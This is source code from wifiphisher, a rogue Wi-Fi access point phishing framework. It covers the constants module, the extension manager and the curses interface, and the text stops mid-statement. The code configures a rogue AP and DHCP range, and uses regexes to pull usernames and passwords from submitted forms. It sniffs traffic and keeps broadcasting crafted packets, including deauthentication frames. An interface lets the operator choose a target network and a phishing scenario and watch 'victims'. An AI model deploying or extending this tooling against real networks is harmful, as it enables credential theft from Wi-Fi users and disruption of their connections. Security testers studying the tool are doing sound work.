wifiphisher/common/constants.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file import os dir_of_executable = os.path.dirname(__file__) path_to_project_root = os.path.abspath( os.path.join(dir_of_executable, '../../wifiphisher')) dir_of_data = path_to_project_root + '/data/' phishing_pages_dir = dir_of_data + "phishing-pages/" # Basic configuration DEV = 1 DEAUTH_EXTENSION = "deauth" LURE10_EXTENSION = "lure10" WPSPBC = "wpspbc" KNOWN_BEACONS_EXTENSION = "knownbeacons" HANDSHAKE_VALIDATE_EXTENSION = "handshakeverify" ROGUEHOSTAPDINFO = "roguehostapdinfo" DEFAULT_EXTENSIONS = [DEAUTH_EXTENSION] EXTENSIONS_LOADPATH = "wifiphisher.extensions." PORT = 8080 SSL_PORT = 443 CHANNEL = 6 WEBSITE = "https://wifiphisher.org" PUBLIC_DNS = "8.8.8.8" PEM = dir_of_data + 'cert/server.pem' SCENARIO_HTML_DIR = "html/" LOGOS_DIR = dir_of_data + "logos/" LOCS_DIR = dir_of_data + "locs/" MAC_PREFIX_FILE = dir_of_data + "wifiphisher-mac-prefixes" URL_TO_OS_FILE = dir_of_data + "wifiphisher-os-initial-requests" KNOWN_WLANS_FILE = dir_of_data + "wifiphisher-known-open-wlans" POST_VALUE_PREFIX = "wfphshr" NETWORK_IP = "10.0.0.0" NETWORK_MASK = "255.255.255.0" NETWORK_GW_IP = "10.0.0.1" DHCP_LEASE = "10.0.0.2,10.0.0.100,12h" WIFI_BROADCAST = "ff:ff:ff:ff:ff:ff" WIFI_INVALID = "00:00:00:00:00:00" WIFI_IPV6MCAST1 = "33:33:00:" WIFI_IPV6MCAST2 = "33:33:ff:" WIFI_SPANNINGTREE = "01:80:c2:00:00:00" WIFI_MULTICAST = "01:00:5e:" NON_CLIENT_ADDRESSES = set([ WIFI_BROADCAST, WIFI_INVALID, WIFI_MULTICAST, WIFI_IPV6MCAST1, WIFI_IPV6MCAST2, WIFI_SPANNINGTREE, None ]) DEFAULT_OUI = '00:00:00' LINES_OUTPUT = 3 DN = open(os.devnull, 'w') INTERFERING_PROCS = [ "wpa_action", "wpa_supplicant", "wpa_cli", "dhclient", "ifplugd", "dhcdbd", "dhcpcd", "udhcpc", "avahi-autoipd", "avahi-daemon", "wlassistant", "wifibox", "NetworkManager", "knetworkmanager" ] DNS_CONF_PATH = '/tmp/dnsmasq.conf' NEW_YEAR = "01-01" BIRTHDAY = "01-05" # Modes of operation # AP, Extensions # 2 cards, 2 interfaces # i) AP, ii) EM OP_MODE1 = 0x1 # AP, Extensions and Internet # 3 cards, 3 interfaces # i) AP, ii) EM iii) Internet OP_MODE2 = 0x2 # AP-only and Internet # 2 cards, 2 interfaces # i) AP, ii) Internet OP_MODE3 = 0x3 # AP-only # 1 card, 1 interface # i) AP OP_MODE4 = 0x4 # AP, Extensions w/ 1 vif # 1 card, 2 interfaces # i) AP, ii) Extensions OP_MODE5 = 0x5 # AP, Extensions and Internet w/ 1 vif # 2 cards, 3 interfaces # i) AP, ii) Extensions, iii) Internet OP_MODE6 = 0x6 # Advanced and WPS association 0x7 # 3 cards, 3 interfaces # i) AP, ii) Extensions, iii) Extensions (Managed) OP_MODE7 = 0x7 # Advanced and WPS association w/ 1 vif support AP/Monitor 0x8 # 2 cards, 3 interfaces # i) AP, ii) Extensions, iii) Extensions (Managed) OP_MODE8 = 0x8 AP_RATES = "\x0c\x12\x18\x24\x30\x48\x60\x6c" # Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray T = '\033[93m' # tan # Logging configurations # possible values for debug levels are: # CRITICAL, ERROR, WARNING, INFO, DEBUG, NOTSET LOG_LEVEL = 'INFO' LOG_FILEPATH = 'wifiphisher.log' LOGGING_CONFIG = { 'version': 1, # Defined the handlers 'handlers': { 'file': { 'class': 'logging.handlers.RotatingFileHandler', 'level': LOG_LEVEL, 'formatter': 'detailed', 'filename': LOG_FILEPATH, 'backupCount': 3, }, }, # fomatters for the handlers 'formatters': { 'detailed': { 'format': '%(asctime)s - %(name) 32s - %(levelname)s - %(message)s' }, }, 'root': { 'level': 'DEBUG', 'handlers': [ 'file', ], }, "loggers": {}, 'disable_existing_loggers': False } CREDENTIALS_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S' # Phishinghttp VALID_POST_CONTENT_TYPE = "application/x-www-form-urlencoded" REGEX_PWD = "password|pwd|pass" REGEX_UNAME = "username|uname|name" # TUI MAIN_TUI_ATTRS = 'version essid channel ap_iface em phishinghttp args' AP_SEL_ATTRS = 'interface mac_matcher network_manager args' # Fourway handshake extension CONST_A = "Pairwise key expansion" # Rogue AP related DENY_MACS_PATH = '/tmp/hostapd.deny' # Known Beacons KB_INTERVAL = 20 KB_BUCKET_SIZE = 60 KB_BEACON_CAP = 0x2105 File: wifiphisher/common/__init__.py File: wifiphisher/common/extensions.py """ All logic regarding extensions management """ import collections import importlib import logging import threading import time from collections import defaultdict import scapy.arch.linux as linux import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal import wifiphisher.extensions.deauth as deauth_extension logger = logging.getLogger(__name__) is_deauth_cont = True def register_backend_funcs(func): """ Register the specific function in extension as backend methods :param func: The instance function needed to register as backend method :type func: instancemethod :return: None """ func.is_backendmethod = True return func class ExtensionManager(object): """ Extension Manager (EM) defines an API for modular architecture in Wifiphisher. All extensions that lie under "extensions" directory and are also defined in EXTENSIONS constant are loaded and leveraged by EM. Each extension can take advantage of the second wireless card (the first is used for the rogue AP), aka run in "Advanced mode". Each extension needs to be defined as a class that has the name of the filename in camelcase. For example, deauth.py would have a Deauth() class. Currently, extensions need to provide the following methods: * __init__(self, data): Basic initialization that received a dictionary with data from the main engine. * get_packet(self, pkt): Method to process individually each packet captured from the second card (monitor mode). * send_output(self): Method that returns in a list of strings the entry logs that we need to output. * on_exit(self): Method that frees all the used resources * each extension can define the backend method as follows: ex: @extensions.register_backend_funcs def psk_verify(self, *list_data): return list_data """ def __init__(self, network_manager): """ Init the EM object. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ self._nm = network_manager self._extensions_str = [] self._extensions = [] self._interface = None self._socket = None self._should_continue = True self._packets_to_send = defaultdict(list) self._channels_to_hop = [] self._current_channel = "1" self._listen_thread = threading.Thread(target=self._listen) self._send_thread = threading.Thread(target=self._send) self._channelhop_thread = threading.Thread(target=self._channel_hop) self._shared_data = None def get_ui_funcs(self): """ Returns a list of all the uimethods. :param self: An ExtensionManager object :type self: ExtensionManager :return: List Object :rtype: List """ ui_funcs = [] # loop each extension object for extension in self._extensions: # loop all the attribute for the extension object for attr in dir(extension): if callable(getattr(extension, attr)): method = getattr(extension, attr) if hasattr(method, "is_uimethod"): ui_funcs.append(method) return ui_funcs def get_backend_funcs(self): """ Returns a list of all the backend methods :param self: An ExtensionManager object :type self: ExtensionManager :return: dict object :rtype: dict """ backend_funcs = {} for extension in self._extensions: for attrname in dir(extension): method = getattr(extension, attrname) if hasattr(method, 'is_backendmethod'): # store the method name to extension map backend_funcs[method.__name__] = extension return backend_funcs def _channel_hop(self): """ Change the interface's channel every three seconds :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None .. note: The channel range is between 1 to 13 """ # set the current channel to the ap channel self._nm.set_interface_channel(self._interface, int(self._shared_data.target_ap_channel)) # if the stop flag not set, change the channel while self._should_continue: for channel in self._channels_to_hop: if self._current_channel != channel: self._current_channel = channel # added this check to reduce shutdown time if self._should_continue: try: self._socket.close() self._nm.set_interface_channel( self._interface, int(self._current_channel)) self._socket = linux.L2Socket( iface=self._interface) # extends the channel hopping time to sniff # more frames time.sleep(3) except BaseException: continue else: break def set_interface(self, interface): """ Sets interface for EM. :param self: An ExtensionManager object :type self: ExtensionManager :param interface: Interface name :type interface: String :return: None :rtype: None """ self._interface = interface self._socket = linux.L2Socket(iface=self._interface) def set_extensions(self, extensions): """ Sets extensions for EM. :param self: An ExtensionManager object :type self: ExtensionManager :param extensions: List of str extension names :type extensions: List :return: None :rtype: None """ self._extensions_str = extensions def init_extensions(self, shared_data): """ Init EM extensions. Should be run when all shared data has been gathered. :param self: An ExtensionManager object :type self: ExtensionManager :param shared_data: Dictionary object :type shared_data: Dictionary :return: None :rtype: None """ # Convert shared_data from dict to named tuple shared_data = collections.namedtuple('GenericDict', list(shared_data.keys()))(**shared_data) self._shared_data = shared_data # Initialize all extensions with the shared data for extension in self._extensions_str: mod = importlib.import_module(constants.EXTENSIONS_LOADPATH + extension) extension_class = getattr(mod, extension.title()) obj = extension_class(shared_data) self._extensions.append(obj) def start_extensions(self): """ Starts the two main daemons of EM: 1) Daemon that listens to every packet and forwards it to each extension for further processing. 2) Daemon that receives special-crafted packets from extensions and broadcasts them in the air. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ # One daemon is listening for packets... self._listen_thread.start() # ...another daemon is sending packets self._send_thread.start() # daemon for channel hopping self.get_channels() if self._shared_data.is_freq_hop_allowed: self._channelhop_thread.start() else: self._current_channel = self._shared_data.target_ap_channel def on_exit(self): """ Stops both daemons of EM on exit. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ self._should_continue = False if self._listen_thread.is_alive(): self._listen_thread.join(3) if self._send_thread.is_alive(): self._send_thread.join(3) if (self._shared_data is not None and self._shared_data.is_freq_hop_allowed and self._channelhop_thread.is_alive()): self._channelhop_thread.join(3) # Close socket if it's open try: self._socket.close() except AttributeError: pass # Clean resources used by extension modules for extension in self._extensions: extension.on_exit() def get_channels(self): """ Gets the channels from each extension. Merges them to create a list of channels to hop. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ for extension in self._extensions: channels_interested = extension.send_channels() number_of_channels = len(channels_interested) if channels_interested and number_of_channels > 0: # Append only new channels (no duplicates) self._channels_to_hop += list( set(channels_interested) - set(self._channels_to_hop)) def get_output(self): """ Gets the output of each extensions. Merges them in a list and returns it. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ output = [] for extension in self._extensions: m_output = extension.send_output() num_of_lines = len(m_output) if m_output and num_of_lines > 0: output += m_output return output def _process_packet(self, pkt): """ Pass each captured packet to each module. Gets the packets to send. :param self: An ExtensionManager object :type self: ExtensionManager :param pkt: A Scapy packet object :type pkt: Scapy Packet :return: None :rtype: None """ # clear the _packets_to_send on every run of the # sniffed frame self._packets_to_send = defaultdict(list) channels = [str(ch) for ch in universal.ALL_2G_CHANNELS] + ["*"] for extension in self._extensions: ext_pkts = extension.get_packet(pkt) for channel in channels: self._packets_to_send[channel] += ext_pkts[channel] def _stopfilter(self, pkt): """ A scapy filter to determine if we need to stop. :param self: An ExtensionManager object :type self: ExtensionManager :param self: A Scapy packet object :type self: Scapy Packet :return: True or False :rtype: Boolean """ return not self._should_continue def _listen(self): """ Listening thread. Listens for packets and forwards them to _process_packet. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ # continue to find clients until told otherwise dot11.sniff( iface=self._interface, prn=self._process_packet, store=0, stop_filter=self._stopfilter) def _send(self): """ Sending thread. Continously broadcasting packets crafted by extensions. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ while self._should_continue: for pkt in self._packets_to_send[self._current_channel] + \ self._packets_to_send["*"]: try: if is_deauth_cont or not deauth_extension.is_deauth_frame(pkt): logger.debug("Send pkt with A1:%s A2:%s subtype:%s in channel:%s", pkt.addr1, pkt.addr2, pkt.subtype, self._current_channel) self._socket.send(pkt) except BaseException: continue time.sleep(1) File: wifiphisher/common/tui.py """ This module was made to handle the curses sections for the ap selection, template selection and the main window """ import curses import os import re import time from collections import namedtuple from subprocess import check_output import wifiphisher.common.accesspoint as accesspoint import wifiphisher.common.constants as constants import wifiphisher.common.phishingpage as phishingpage import wifiphisher.common.recon as recon import wifiphisher.common.victim as victim # information for the main terminal MainInfo = namedtuple("MainInfo", constants.MAIN_TUI_ATTRS) # information for the AP selection terminal ApSelInfo = namedtuple("ApSelInfo", constants.AP_SEL_ATTRS) class TuiTemplateSelection(object): """ TUI to do Template selection """ def __init__(self): """ Construct the class :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :return None :rtype None """ self.green_text = None # heightlight the phishing scenario self.heightlight_text = None # record current hightlight template number self.heightlight_number = 0 # store the current page number self.page_number = 0 # store the phishing contents of each scenario self.sections = list() # map the section to page number self.sec_page_map = {} # the window size for (y, x) self.dimension = [0, 0] def get_sections(self, template_names, templates): """ Get all the phishing scenario contents and store them in a list :param self: A TuiTemplateSelection object :param template_names: A list of string :param templates: A dictionary :type self: TuiTemplateSelection :type template_names: list :type templates: dict :return None :rtype: None """ for name in template_names: phishing_contents = " - " + str(templates[name]) # total line in the phishing contents lines = phishing_contents.splitlines() # split the line into 15 words per shorter line short_lines = [] for line in lines: for short_line in line_splitter(15, line): short_lines.append(short_line) self.sections.append(short_lines) def update_sec_page_map(self, last_row): """ Update the page number for each section :param self: A TuiTemplateSelection object :param last_row: The last row of the window :type self: TuiTemplateSelection :type last_row: int :return: None :rtype: None """ page_number = 0 row_number = 0 self.sec_page_map = {} for number, section in enumerate(self.sections): row_number += len(section) if row_number > last_row: row_number = 0 page_number += 1 self.sec_page_map[number] = page_number def gather_info(self, template_argument, template_manager): """ Select a template based on whether the template argument is set or not. If the template argument is not set, it will interfactively ask user for a template :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param template_argument: The template argument which might have been entered by the user :type template_argument: str :param template_manager: A TemplateManager object :type template_manager: TemplateManager :return A PhishingTemplate object :rtype: PhishingTemplagte :raises InvalidTemplate in case the template argument entered by the user is not available. """ # get all available templates templates = template_manager.get_templates() # get all the templates names for display template_names = list(templates.keys()) # get all the section contents self.get_sections(template_names, templates) # check if the template argument is set and is correct if template_argument and template_argument in templates: # return the template name return templates[template_argument] elif template_argument and template_argument not in templates: # in case of an invalid template raise phishingpage.InvalidTemplate else: # prompt interactive phishing scenarios to let user select one template = curses.wrapper(self.display_info, templates, template_names) return template def key_movement(self, screen, number_of_sections, key): """ Check for key movement and hightlight the corresponding phishing scenario :param self: A TuiTemplateSelection object :param number_of_sections: Number of templates :param key: The char user keying :type self: TuiTemplateSelection :type number_of_sections: int :type key: str :return: None :rtype: None """ if key == curses.KEY_DOWN: if self.heightlight_number < number_of_sections - 1: page_number = self.sec_page_map[self.heightlight_number + 1] if page_number > self.page_number: self.page_number += 1 screen.erase() self.heightlight_number += 1 elif key == curses.KEY_UP: if self.heightlight_number > 0: page_number = self.sec_page_map[self.heightlight_number - 1] if page_number < self.page_number: self.page_number -= 1 screen.erase() self.heightlight_number -= 1 def display_phishing_scenarios(self, screen): """ Display the phishing scenarios :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param screen: A curses window object :type screen: _curses.curses.window :return total row numbers used to display the phishing scenarios :rtype: int """ try: max_window_height, max_window_len = screen.getmaxyx() if self.dimension[0] != max_window_height or\ self.dimension[1] != max_window_len: screen.erase() self.dimension[0] = max_window_height self.dimension[1] = max_window_len # add margins for changing the pages self.update_sec_page_map(max_window_height - 20) display_str = "Options: [Up Arrow] Move Up [Down Arrow] Move Down" screen.addstr(0, 0, display_string(max_window_len, display_str)) display_str = "Available Phishing Scenarios:" screen.addstr(3, 0, display_string(max_window_len, display_str), curses.A_BOLD) except curses.error: return 0 # add blank line row_num = 5 first = False for number, short_lines in enumerate(self.sections): try: # incase user shrink the window and the heightlight section # is in the next page. for this case, just shift the # heightlight section to the first scenario in the first # page if self.sec_page_map[self.heightlight_number] !=\ self.page_number and not first: # heightlight the first scenario screen.addstr(row_num, 2, short_lines[0], self.heightlight_text) self.heightlight_number = 0 self.page_number = 0 first = True # display the sections belonged to the current page if self.sec_page_map[number] != self.page_number: continue screen.addstr(row_num, 0, str(number + 1), self.green_text) # emphasize the phishing scenario if number == self.heightlight_number: screen.addstr(row_num, 2, short_lines[0], self.heightlight_text) else: screen.addstr(row_num, 2, short_lines[0], curses.A_BOLD) row_num += 1 # add 8 spaces to the first line screen.addstr(row_num, 8, short_lines[1]) row_num += 1 if len(short_lines) > 1: for short_line in short_lines[2:]: screen.addstr(row_num, 0, short_line) row_num += 1 # add blank line between phishing scenarios row_num += 1 except curses.error: return row_num return row_num def display_info(self, screen, templates, template_names): """ Display the template information to users :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param screen: A curses window object :type screen: _curses.curses.window :param templates: A dictionay map page to PhishingTemplate :type templates: dict :param template_names: list of template names :type template_names: list """ # setup curses try: curses.curs_set(0) except curses.error: pass screen.nodelay(True) curses.init_pair(1, curses.COLOR_GREEN, screen.getbkgd()) # heightlight the phishing scenarios curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_CYAN) self.green_text = curses.color_pair(1) | curses.A_BOLD self.heightlight_text = curses.color_pair(2) | curses.A_BOLD # setup number of templates number_of_sections = len(templates) # how many chars for user keying the template number screen.erase() while True: # display the four default phishing scenarios # catch the exception when screen size is smaller than # the text length row_number = self.display_phishing_scenarios(screen) # update the heightlight_number key = screen.getch() self.key_movement(screen, number_of_sections, key) # add two blank lines row_number += 2 # display the words of chosen template if key == ord("\n"): try: screen.addstr(row_number, 3, "YOU HAVE SELECTED " + template_names[self.heightlight_number], curses.A_BOLD) except curses.error: pass screen.refresh() time.sleep(1) template_name = template_names[self.heightlight_number] template = templates[template_name] return template screen.refresh() class ApDisplayInfo(object): """ ApDisplayInfo class to store the information for ap selection """ def __init__(self, pos, page_number, box, box_info): """ Construct the class :param self: ApDisplayInfo :param pos: position of the line in the ap selection page :param page_number: page number of the ap selection :param box: the curses.newwin.box object containing ap information :param key: the key user have keyed in :param box_info: list of window height, window len, and max row number :type self: ApDisplayInfo :type pos: int :type page_number: int :type box: curse.newwin.box :type key: str :return: None :rtype: None """ self.pos = pos self.page_number = page_number self.box = box # list of (max_win_height, max_win_len, max_row, key) self._box_info = box_info @property def max_h(self): """ The height of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: the height of terminal screen :rtype: int """ return self._box_info[0] @max_h.setter def max_h(self, val): """ Set the height of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[0] = val @property def max_l(self): """ The width of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: the width of terminal screen :rtype: int """ return self._box_info[1] @max_l.setter def max_l(self, val): """ Set the width of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[1] = val @property def max_row(self): """ Maximum row numbers used to contain the ap information :param self: ApDisplayInfo :type self: ApDisplayInfo :return: The row numbers of the box that contains the ap info :rtype: int """ return self._box_info[2] @max_row.setter def max_row(self, val): """ Set maximum row numbers used to contain the ap information :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[2] = val @property def key(self): """ Get the key the users have keyed :param self: ApDisplayInfo :type self: ApDisplayInfo :return: The key :rtype: int """ return self._box_info[3] @key.setter def key(self, val): """ Set the key the users have keyed :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[3] = val class TuiApSel(object): """ TuiApSel class to represent the ap selection terminal window """ def __init__(self): """ Construct the class :param self: A TuiApSel object :type self: TuiApSel :return: None :rtype: None """ self.total_ap_number = 0 self.access_points = list() self.access_point_finder = None self.highlight_text = None self.normal_text = None self.mac_matcher = None # when screen becomes too small we'll create a box with # the size equal to the screen terminal. We need to renew # the box when the screen terminal expands again. self.renew_box = False def init_display_info(self, screen, info): """ Initialization of the ApDisplyInfo object :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param info: A namedtuple of information from pywifiphisher :type info: namedtuple :return ApDisplayInfo object :rtype: ApDisplayInfo """ position = 1 page_number = 1 # get window height, length and create a box inside max_window_height, max_window_length = screen.getmaxyx() if max_window_height < 14 or max_window_length < 9: box = curses.newwin(max_window_height, max_window_length, 0, 0) self.renew_box = True else: box = curses.newwin(max_window_height - 9, max_window_length - 5, 4, 3) box.box() # calculate the box's maximum number of row's box_height = box.getmaxyx()[0] # subtracting 2 from the height for the border max_row = box_height - 2 key = 0 box_info = [max_window_height, max_window_length, max_row, key] ap_info = ApDisplayInfo(position, page_number, box, box_info) self.mac_matcher = info.mac_matcher # start finding access points self.access_point_finder = recon.AccessPointFinder( info.interface, info.network_manager) if info.args.lure10_capture: self.access_point_finder.capture_aps() self.access_point_finder.find_all_access_points() return ap_info def gather_info(self, screen, info): """ Get the information from pywifiphisher and print them out :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param info: A namedtuple of information from pywifiphisher :type info: namedtuple :return AccessPoint object if users type enter :rtype AccessPoint if users type enter else None """ # setup curses # make cursor invisible try: curses.curs_set(0) except curses.error: pass # don't wait for user input screen.nodelay(True) # setup the font color curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_CYAN) self.highlight_text = curses.color_pair(1) self.normal_text = curses.A_NORMAL # information regarding access points ap_info = self.init_display_info(screen, info) # show information until user presses Esc key while ap_info.key != 27: # display info will modifiy the key value is_done = self.display_info(screen, ap_info) if is_done: # turn off access point discovery and return the result self.access_point_finder.stop_finding_access_points() return self.access_points[ap_info.pos - 1] # turn off access point discovery self.access_point_finder.stop_finding_access_points() def resize_window(self, screen, ap_info): """ Resize the window if the dimensions have been changed :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo """ if screen.getmaxyx() != (ap_info.max_h, ap_info.max_l): ap_info.max_h, ap_info.max_l = screen.getmaxyx() # sanity check for the box size (the height needed is 10 and # the width needed is 6. Just create a box which is same as the # base screen if ap_info.max_h < 10 + 4 or ap_info.max_l < 6 + 3: box = curses.newwin(ap_info.max_h, ap_info.max_l, 0, 0) box.box() ap_info.box = box self.renew_box = True return elif self.renew_box: screen.erase() box = curses.newwin(ap_info.max_h - 9, ap_info.max_l - 5, 4, 3) box.box() ap_info.box = box self.renew_box = False ap_info.box.resize(ap_info.max_h - 9, ap_info.max_l - 5) # calculate the box's maximum number of row's box_height = ap_info.box.getmaxyx()[0] # subtracting 2 from the height for the border ap_info.max_row = box_height - 2 # reset the page and position to avoid problems ap_info.pos = 1 ap_info.page_number = 1 def key_movement(self, ap_info): """ Check for any key movement and update it's result :param self: A TuiApSel object :type self: TuiApSel :param ap_info: ApDisplayInfo object :type: ApDisplayInfo :return: None :rtype: None """ key = ap_info.key pos = ap_info.pos max_row = ap_info.max_row page_number = ap_info.page_number # in case arrow down key has been pressed if key == curses.KEY_DOWN: # if next item exists move down, otherwise don't move try: self.access_points[pos] except IndexError: ap_info.key = 0 ap_info.pos = pos ap_info.max_row = max_row return # if next item is in the next page change page and move # down otherwise just move down) if pos % max_row == 0: pos += 1 page_number += 1 else: pos += 1 # in case arrow up key has been pressed elif key == curses.KEY_UP: # if not the first item if (pos - 1) > 0: # if previous item is in previous page_number, change page # and move up otherwise just move up if (pos - 1) % max_row == 0: pos -= 1 page_number -= 1 else: pos -= 1 # update key, position, and page_number ap_info.key = key ap_info.pos = pos ap_info.page_number = page_number def display_info(self, screen, ap_info): """ Display the AP informations on the screen :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo :return True if ap selection is done :rtype: bool """ is_apsel_end = False self.resize_window(screen, ap_info) # check if any new access points have been discovered new_total_ap_number = len( self.access_point_finder.observed_access_points) if new_total_ap_number != self.total_ap_number: self.access_points = self.access_point_finder.\ get_sorted_access_points() self.total_ap_number = len(self.access_points) # display the information to the user self.display_access_points(screen, ap_info) # check for key movement and store result self.key_movement(ap_info) # ask for a key input (doesn't block) ap_info.key = screen.getch() if ap_info.key == ord("\n") and self.total_ap_number != 0: # show message and exit screen.addstr(ap_info.max_h - 2, 3, "YOU HAVE SELECTED " + self.access_points[ap_info.pos - 1].name) screen.refresh() time.sleep(1) is_apsel_end = True return is_apsel_end def display_access_points(self, screen, ap_info): """ Display information in the box window :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo :return: None :rtype: None .. note: The display system is setup like the following: ---------------------------------------- - (1,3)Options - - (3,5)Header - - (4,3)**************************** - - * ^ * - - * | * - - * | * - - < * |---- * - - v * | v * - - v * | v * - - v * | v * - - v * v v * - - v ************v*************** - - v v v - -----v-------------v------v------------- v v v v v > max_window_length-5 v v max_window_height-9 v V v--> box_height-2 """ # get the page boundary page_boundary = list(range(1 + (ap_info.max_row * (ap_info.page_number - 1)), ap_info.max_row + 1 + (ap_info.max_row * (ap_info.page_number - 1)))) # remove previous content and draw border ap_info.box.erase() ap_info.box.border(0) # show the header header_fmt = "{0:30} {1:16} {2:3} {3:4} {4:9} {5:5} {6:20}" header = header_fmt.format("ESSID", "BSSID", "CH", "PWR", "ENCR", "CLIENTS", "VENDOR") opt_str = ("Options: [Esc] Quit [Up Arrow] Move Up " "[Down Arrow] Move Down") try: window_l = screen.getmaxyx()[1] screen.addstr(1, 3, display_string(window_l - 3, opt_str)) screen.addstr(3, 5, display_string(window_l - 5, header)) except curses.error: return # show all the items based on their position for item_position in page_boundary: # in case of no access points discovered yet if self.total_ap_number == 0: display_str = "No access point has been discovered yet!" try: ap_info.box.addstr(1, 1, display_string(ap_info.max_l - 1, display_str), self.highlight_text) except curses.error: return # in case of at least one access point else: # get the access point and it's vendor access_point = self.access_points[item_position - 1] vendor = self.mac_matcher.get_vendor_name( access_point.mac_address) # the display format for showing access points display_text = (( "{0:30} {1:17} {2:2} {3:3}% {4:^8} {5:^5}" " {6:20}").format( access_point.name, access_point.mac_address, access_point.channel, access_point.signal_strength, access_point.encryption, access_point.client_count, vendor)) # shows whether the access point should be highlighted or not # based on our current position print_row_number = item_position - ap_info.max_row * ( ap_info.page_number - 1) # bypass the addstr exception try: if item_position == ap_info.pos: ap_info.box.addstr(print_row_number, 2, display_string( ap_info.max_l - 2, display_text), self.highlight_text) else: ap_info.box.addstr(print_row_number, 2, display_string( ap_info.max_l - 2, display_text), self.normal_text) except curses.error: return # stop if it is the last item in page if item_position == self.total_ap_number: break # update the screen screen.refresh() ap_info.box.refresh() class TuiMain(object): """ TuiMain class to represent the main terminal window """ def __init__(self): """ Construct the class :param self: A TuiMain object :type self: TuiMain :return: None :rtype: None """ self.blue_text = None self.orange_text = None self.yellow_text = None def gather_info(self, screen, info): """ Get the information from pywifiphisher and print them out :param self: A TuiMain object :param screen: A curses window object :param info: A namedtuple of printing information :type self: TuiMain :type screen: _curses.curses.window :type info: namedtuple :return: None :rtype: None """ # setup curses try: curses.curs_set(0) except curses.error: pass screen.nodelay(True) curses.init_pair(1, curses.COLOR_BLUE, screen.getbkgd()) curses.init_pair(2, curses.COLOR_YELLOW, screen.getbkgd()) curses.init_pair(3, curses.COLOR_RED, screen.getbkgd()) self.blue_text = curses.color_pair(1) | curses.A_BOLD self.yellow_text = curses.color_pair(2) | curses.A_BOLD self.red_text = curses.color_pair(3) | curses.A_BOLD while True: # catch the exception when screen size is smaller than # the text length is_done = self.display_info(screen, info) if is_done: return def print_http_requests(self, screen, start_row_num, http_output): """ Print the http request on the main terminal :param self: A TuiMain object :type self: TuiMain :param start_row_num: start line to print the http request type start_row_num: int :param http_output: string of the http requests :type http_output: str """ requests = http_output.splitlines() match_str = r"(.*\s)(request from\s)(.*)(\sfor|with\s)(.*)" for request in requests: # match the information from the input string match = re.match(match_str, request.decode('utf-8')) if match is None: continue # POST or GET request_type = match.group(1) # requst from request_from = match.group(2) # ip address or http address ip_address = match.group(3) # for or with for_or_with = match.group(4) resource = match.group(5) start_col = 0 screen.addstr(start_row_num, start_col, '[') start_col += 1 screen.addstr(start_row_num, start_col, '*', self.yellow_text) start_col += 1 screen.addstr(start_row_num, start_col, '] ') start_col += 2 # concatenate GET or POST screen.addstr(start_row_num, start_col, request_type, self.yellow_text) start_col += len(request_type) # concatenate the word 'request from' screen.addstr(start_row_num, start_col, request_from) start_col += len(request_from) # concatenate the ip address screen.addstr(start_row_num, start_col, ip_address, self.yellow_text) start_col += len(ip_address) # concatenate with or for screen.addstr(start_row_num, start_col, for_or_with) start_col += len(for_or_with) # resource url screen.addstr(start_row_num, start_col, resource, self.yellow_text) start_row_num += 1 def display_info(self, screen, info): """ Print the information of Victims on the terminal :param self: A TuiMain object :param screen: A curses window object :param info: A nameduple of printing information :type self: TuiMain :type screen: _curses.curses.window :type info: namedtuple :return True if users have pressed the Esc key :rtype: bool """ # Get accesspoint instance and read victims from file accesspoint_instance = accesspoint.AccessPoint.get_instance() accesspoint_instance.read_connected_victims_file() is_done = False screen.erase() _, max_window_length = screen.getmaxyx() try: # print the basic info on the right top corner screen.addstr(0, max_window_length - 30, "|") screen.addstr(1, max_window_length - 30, "|") # continue from the "Wifiphisher" screen.addstr(1, max_window_length - 29, " Wifiphisher " + info.version, self.blue_text) screen.addstr(2, max_window_length - 30, "|" + " ESSID: " + info.essid) screen.addstr(3, max_window_length - 30, "|" + " Channel: " + info.channel) screen.addstr(4, max_window_length - 30, "|" + " AP interface: " + info.ap_iface) screen.addstr(5, max_window_length - 30, "|" + " Options: [Esc] Quit") screen.addstr(6, max_window_length - 30, "|" + "_" * 29) # Print the extensions section screen.addstr(1, 0, "Extensions feed: ", self.blue_text) except curses.error: pass if info.em: # start raw number from 2 raw_num = 2 for client in info.em.get_output()[-5:]: screen.addstr(raw_num, 0, client) raw_num += 1 try: # Print the connected victims section screen.addstr(7, 0, 